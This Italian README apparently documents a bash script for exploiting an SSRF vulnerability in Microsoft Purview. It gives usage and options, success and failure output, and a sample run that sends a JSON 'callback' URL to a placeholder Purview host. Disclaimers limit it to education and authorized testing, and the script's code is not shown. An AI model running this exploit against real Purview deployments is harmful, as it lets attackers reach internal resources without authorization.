
La vulnerabilità SSRF in Microsoft Purview
Questo repository contiene uno script progettato per eseguire un exploit SSRF (Server-Side Request Forgery) a fini di test ed educativi. Utilizza questo strumento in modo responsabile e solo in ambienti in cui hai esplicita autorizzazione.
bash (shell Unix)jq (elaboratore JSON)curl (strumento da riga di comando per richieste HTTP)./script.sh --exploit <target_url> <purview_url>
| Opzione | Descrizione |
|---|---|
-h, --help | Mostra il menu di aiuto. |
--exploit tu pu | Esegue l'exploit SSRF con gli URL target e purview. |
./script.sh -h
Output:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
Output Previsto:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_url, tentando di sfruttare una vulnerabilità SSRF../script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
Il codice di risposta HTTP e il corpo vengono salvati e, in base al codice di stato, viene determinato il successo o il fallimento dell'exploit.
Questo script è solo a scopo di test. L'uso improprio di questo script può portare a gravi conseguenze legali. Assicurati di rispettare tutte le leggi applicabili e gli standard etici.
Sentiti libero di contribuire creando pull request o segnalando problemi.
Questo strumento è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati. L'autore non è responsabile per qualsiasi abuso o danno causato da questo strumento.